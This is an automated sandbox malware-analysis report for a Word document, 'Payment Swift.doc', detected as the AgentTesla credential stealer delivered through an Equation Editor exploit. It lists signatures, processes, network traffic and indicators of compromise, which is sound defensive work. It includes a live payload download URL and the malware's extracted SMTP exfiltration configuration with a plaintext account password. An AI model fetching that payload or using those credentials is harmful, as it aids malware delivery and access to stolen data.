Edit tour

Windows Analysis Report
Payment Swift.doc

Overview

General Information

Sample name:	Payment Swift.doc
Analysis ID:	1431944
MD5:	67fea5000046ad95ddf9707506002eaa
SHA1:	b41f04ef65206c9f0305cc0b124dc9a58f1fe0aa
SHA256:	b8fa7245705f07d10b2f028be43ba688ca78ddc224665a2da85d529c124725b1
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected AgentTesla

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Installs a global keyboard hook

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: SCR File Write Event

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Sigma detected: Suspicious Screensaver Binary File Creation

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2940 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2452 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

microme09255.scr (PID: 3176 cmdline: "C:\Users\user\AppData\Roaming\microme09255.scr" MD5: 75DC78C375DFEE9C0B96FA476BCD5D1C)

microme09255.scr (PID: 3204 cmdline: "C:\Users\user\AppData\Roaming\microme09255.scr" MD5: 75DC78C375DFEE9C0B96FA476BCD5D1C)

EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Payment Swift.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x751e:$obj2: \objdata 0x7538:$obj3: \objupdate 0x74fa:$obj4: \objemb

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x64c6b:$x1: In$J$ct0r
00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: microme09255.scr PID: 3176	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: microme09255.scr PID: 3176	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: microme09255.scr PID: 3204	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: microme09255.scr PID: 3204	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.microme09255.scr.47c0000.7.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x62e6b:$x1: In$J$ct0r
5.2.microme09255.scr.332dd90.4.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x62e6b:$x1: In$J$ct0r
5.2.microme09255.scr.344a420.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.microme09255.scr.344a420.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.microme09255.scr.344a420.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31671:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3176d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x317ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31869:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31971:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a01:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.microme09255.scr.47c0000.7.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x64c6b:$x1: In$J$ct0r
6.2.microme09255.scr.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.microme09255.scr.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.microme09255.scr.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33471:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3356d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x335ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33669:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33771:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33801:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.microme09255.scr.340f9f0.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.microme09255.scr.340f9f0.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.microme09255.scr.340f9f0.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31671:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x316e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3176d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x317ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31869:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x318db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31971:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a01:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.microme09255.scr.332dd90.4.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x64c6b:$x1: In$J$ct0r
5.2.microme09255.scr.344a420.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.microme09255.scr.344a420.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.microme09255.scr.344a420.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33471:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dc91:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6dd03:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3356d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6dd8d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x335ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6de1f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33669:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6de89:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6defb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33771:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6df91:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33801:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e021:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.microme09255.scr.22cf214.2.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xcc0d0:$x1: In$J$ct0r 0xcddd4:$a1: WriteProcessMemory 0xcde60:$a1: WriteProcessMemory 0xcdf34:$a4: VirtualAllocEx 0xce158:$a4: VirtualAllocEx 0xce1d8:$a4: VirtualAllocEx 0x10ce4:$s3: net.pipe 0xcc38c:$s3: net.pipe 0xcc3ac:$s4: vsmacros
5.2.microme09255.scr.340f9f0.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.microme09255.scr.340f9f0.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.microme09255.scr.340f9f0.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33471:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dea1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa86c1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x334e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6df13:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa8733:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3356d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6df9d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa87bd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x335ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e02f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa884f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33669:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e099:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa88b9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x336db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e10b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa892b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33771:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e1a1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa89c1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
5.2.microme09255.scr.22d1a54.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xc9890:$x1: In$J$ct0r 0xcb594:$a1: WriteProcessMemory 0xcb620:$a1: WriteProcessMemory 0xcb6f4:$a4: VirtualAllocEx 0xcb918:$a4: VirtualAllocEx 0xcb998:$a4: VirtualAllocEx 0xe4a4:$s3: net.pipe 0xc9b4c:$s3: net.pipe 0xc9b6c:$s4: vsmacros
Click to see the 16 entries

Sigma Signatures

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.83.128, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2452, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\microme09255.scr", CommandLine: "C:\Users\user\AppData\Roaming\microme09255.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\microme09255.scr, NewProcessName: C:\Users\user\AppData\Roaming\microme09255.scr, OriginalFileName: C:\Users\user\AppData\Roaming\microme09255.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2452, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\microme09255.scr", ProcessId: 3176, ProcessName: microme09255.scr

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\microme09255.scr, QueryName: api.ipify.org

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2452, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2940, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://covid19help.top/microm.scrj	Avira URL Cloud: Label: malware
Source: https://covid19help.top/microm.scrC:	Avira URL Cloud: Label: malware
Source: https://covid19help.top/microm.scr	Avira URL Cloud: Label: phishing
Source: https://covid19help.top/t	Avira URL Cloud: Label: malware
Source: https://covid19help.top/microm.scrkkC:	Avira URL Cloud: Label: malware
Source: https://covid19help.top/microm.scrY	Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.microme09255.scr.344a420.5.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}

Multi AV Scanner detection for domain / URL

Source: covid19help.top	Virustotal: Detection: 24%			Perma Link
Source: https://covid19help.top/microm.scr	Virustotal: Detection: 21%			Perma Link

Multi AV Scanner detection for submitted file

Source: Payment Swift.doc	ReversingLabs: Detection: 43%
Source: Payment Swift.doc	Virustotal: Detection: 45%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\microme09255.scr	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.83.128 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\microme09255.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\microme09255.scr			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.83.128:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49162 version: TLS 1.2

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: microme09255.scr, 00000005.00000002.348544360.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000005.00000002.348261996.0000000000230000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: global traffic	DNS query: name: covid19help.top
Source: global traffic	DNS query: name: api.ipify.org

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
